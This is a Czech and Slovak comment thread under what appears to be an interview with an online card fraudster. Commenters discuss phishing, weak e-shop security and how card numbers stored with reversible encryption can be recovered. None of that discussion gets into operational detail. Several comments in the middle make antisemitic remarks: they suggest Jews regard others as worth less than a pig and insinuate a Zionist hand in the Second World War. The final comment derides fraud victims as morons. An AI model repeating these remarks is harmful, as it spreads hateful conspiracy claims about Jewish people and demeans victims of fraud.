Nejspis jsem paranoidni, ale ziskal jsem dojem, ze hlavnim ukolem bylo ctenari sdelit "nenakupujte levna DVD v zahranicnich obchodech, kupte draha u domacich (treba tyhle dva jsou uplne bezpecne)"... Nevim nakolik se rozmohly nakupy v zahranicnich Internetovych obchodech a jestli to mistni byznysmeni nepovazuji za takove ohrozeni zivnosti, aby si museli koupit napsani clanku. Vyloucit to ovsem nelze.
Zminka o "exploitech pro open-source programy" mi taky neprijde uplne "koser". Jako kdyby pro closed-source produkty exploity neexistovaly.
Dobra uvaha :-). Bohuzel prakticky co rikate asi nebude realne. Totiz ktery obchod by takovou kampan za ocerneni zahranicniho trhu mel podle vas organizovat, aby se mu to vyplatilo ? Nebo myslite ze by v tom mohli byt namoceni vice nez jeden ? :-) To asi ne, nad takovou veci by pri jednanich nachazeli jen tezko spolecnou rec. A s temi rozmahajicimi obchody v zahranici to take neni nijak valne .... takze asi na tom nic nebude.
Co se tech exploitu tycce, jiste jsou v otevrenem i uzavrenem software, rozdíl je pouze v tom že u otevřeného softwaru na ně lépe vidíte :-) . Jinak samozrejme plati jak pro otevreny tak pro uzavreny software ze maloktery administrator je tak dusledny aby sledoval opravy chyb systemu ktery pouziva a pravidelne jej aktualizoval - toho se pak dá využít.
No jo, ale za co by ten obchod při té kampani platil? Stačí podstrčit novinářům informace a oni to rozmáznou zadarmo a ještě budou na sebe hrdí, jak jsou investigativní :-))
podotýkám, že osobně nemám na pravděpodobnost podobné kampaně názor žádný a nekomentuji to, reaguji jen na tu možnou reálnost a komplikovanost zařízení podobné kampaně...
zidum by jiste neprislo koser, aby koser oznaceni uzival nekdo, kdo pro ne ma hodnotu mensi nez prase. Paklize jste zid a nebo dokonce sionista, tak se omlouvam
kdyz uz zminujete rakouskeho strycka, doporucuji vasi pozornosti svetovy sionisticky kongres v bazileji z roku 1936 jak ono to vlastne s tou II svetovou bylo
pro ultrakonzervativni zidy jsou pak menecenne i zidovske zeny :-).. styk pak
probiha skrze plentu, protoze preci zachovani rodu ma vetsi dulezitost nez styk s prasetem
to uz vubec nezminuji, ze podle tory nemaji zide usilovat o vlastni stat ale integrovat se do spolecnosti, ve ktere ziji, ale samozrejme kazde nabozenstvi se da prevykladat ruznymi zpusoby
studovat by ostatne mel kazdy, uz jen pro pochopeni soucasnych problemu - blizky vychod, lidska prava apod v ponekud jinych, neoficialnich ale aspon realnych souvislostech :-)
Zajímavej článek, ale pochopil jsem z něj jen to, co ví každý mírně pokročilý uživatel. Že si mám dávat bacha, nakupovat jenom ve větších, ověřených obchodech, pokud možno neplatit kartou, neposílat svoje osobní údaje jen tak mailem atd. Prostě nevím, co jiného si z toho rozhovoru vzít? Teda pokud nejsem úplně lama...
Myslim, ze to je cela pointa. Kazdy clovek s trochu lepsou znalostou zakladnych (ne)bezpecnostnych technik dokaze podobne podvody urobit s takmer minimalnou namahou, najvacsia namaha je nenechat sa chytit. Zaklad je, ze existuje vela uzivatelov, ktori sa nechaju nachytat (hadajte komu patri primarna vdaka za toto).
Security je moj obor, tj. nemal by som technicky problem urobit podobny podvod, ale naco? Jednak nechcem a jednak nepotrebujem kradnut, pretoze takito zlodejickovia mi zabezpecuju pracu a ich bude este kopa :-) Nemyslim si, ze by som mal nejaku extra moralku, skor som lenivy, aj ked sa rozhodne dobre bavim na tom, jak zlodej okradne zlodeja, podvodnik podvedie podvodnika (viz hlasky o "trzisti").
Podvodnici su rovnako lenivi a vyberaju si najlahsie obete. Kym budu existovat obete, ktore naletia na jednoduchy podvod, tak nemaju dovod zlepsovat techniky. Trebars si neviem celkom dobre predstavit, ze by niekto z nich zneuzival v dohladnom case chybu tykajucu sa implementacie PKCS 1.5 RSA s verejnym exponentom 3.
Vim ze tyto rozhovory je snadne zpochybnit ale dejme tomu ze tento clovicek existuje a podnika timto zpusobem.
jak ale mohl prohlasit toto:?
v databázi měl sice karty šifrované, ale stačilo rozluštit z kódu skriptu, jak je šifruje a bylo vymalováno.
- to jako AHA!! je to AES 256, ted uz jen vemu Google farmu a pockam deset let a mam to vylusteny??!
PS: ale mate pravdu i me prijde phishing metoda pomerne jednoducha k realizaci. alespon na urovni posladniho verejne znameho na CS. (poslal to komukolivna koho mel mail, a jeste z nemeckeho adsl-ka a najednou se tvarila CS ze ma stranky v korei (tvrdi whois), coz me uz fakt rozesmalo.
Protoze "sifrovat" neimplikuje "sifrovat AES256". Brano do dusledku to muze "sifrovat" znamenat (v nejjednodussi variante) pouhy XOR nebo pricteni konstanty.
AES 256 :-), O te pokud vim nepadla jedina zminka. NAvic mi tak kvalitni sifra opravdu nesedi k eshopu do jehoz databaze se bylo mozne dostat vyuzitim trivialni chyby v administracnich skriptech :-). Spis bych rekl ze ten eshop byl pekne odflaknuty, co do zabezpeceni, a pokud tam bylo nejake "sifrovani" mohlo byt tak trivialni, ze pouha znalost jeho algoritmu mohla umoznit rychly zpetny prevod. ... ale to jen spekulujeme, ze ..
Presne to by som predpokladal :-) Kedze samotny server musi transakciu dokazat rozsifrovat, po kompromitovani serveru (a stiahnuti zdrojakov napr.) je jedno, aka sifra by bola pouzita.
Druha vec je utok stazit tym, ze kluc nebude ulozeny v skripte, ale bude sa zadavat pri starte (tj bude len v pamati), co vyzaduje priamy pristup k pamati (root/admin prava) alebo aspon moznost dotazovat sa uz beziaceho skriptu a teda zlozitejsi utok.
A kdyz spadne server, tak se ceka az admin vstane a zada kod, ze ? IMHO pro vetsinu eshopu nepouzitelne. (Restart vam udela hostingova spolecnost, ale zadani kodu tezko).
K cemu ? Neexistuje nic, co lze pro vyssi zabezpeceni tohoto pripadu udelat HW tokenem a nejde udelat ciste virtualnim ovladacem. Dokud na serveru musi byt script schopny transakci rozsifrovat (s asymetrickou kryptografii by se bez toho mozna dalo obejit), bude to prorazitelne.
HW token je dobry v pripade, ze NENI stale pripojeny k pocitaci ... coz by v tomto pripade byt musel.
pokud by nebyla ta sifra reverzni, tak by IMHO zasifrovane cislo kreditky v te db bylo uplne zbytecne :) a jestli mel pristup ke skriptum, tak tam nejspis nekde byl algoritmus na zpetne sestaveni puvodniho retezce, aby to cislo prodejci v administraci krasne videli :)
clanek je zajimavy, urcite verim vic autenticnosti rozhovoru nez ze si to zaplatil mall a vltava :))
... a o lidske blbosti ... no, nezbyva nez vysvetlovat "nepiste cislo kreditky do kazdyho policka, nepiste, nepiste" a "banky takove maily nerozesilaji, nerozesilaji a kdyz vam musi neco oznamit, tak takove maily nerozesilaji!!!"
(ps: podivejte se schvalne kolik mensich ceskych hotelu ma ve svych strankach rezervacni formular ovcividne odesilany nekam mailem a ptaji se tam na cislo kreditky atd... a ja verim ze lidi to stejne vyplnej" :))
No šifra reverzní je, ale když je soukromý klíč na flashce v trezoru, tak útočníkovi jsou ty data dobré tak na bezpečné přepsání disku:) Nebo může upravit skript, ale toho si zas může správce všimnout třeba tripwirem...
Lidi, kteří na takový maily naletí by měli zbavit svéprávonosti, a nebo se pak nemůžou divit, že jim někdo stáhl účet, když sou totální MAGOŘI !!! nic víc vám k tomu neřeknu....ale 20% sem fakt nečekal :-)))))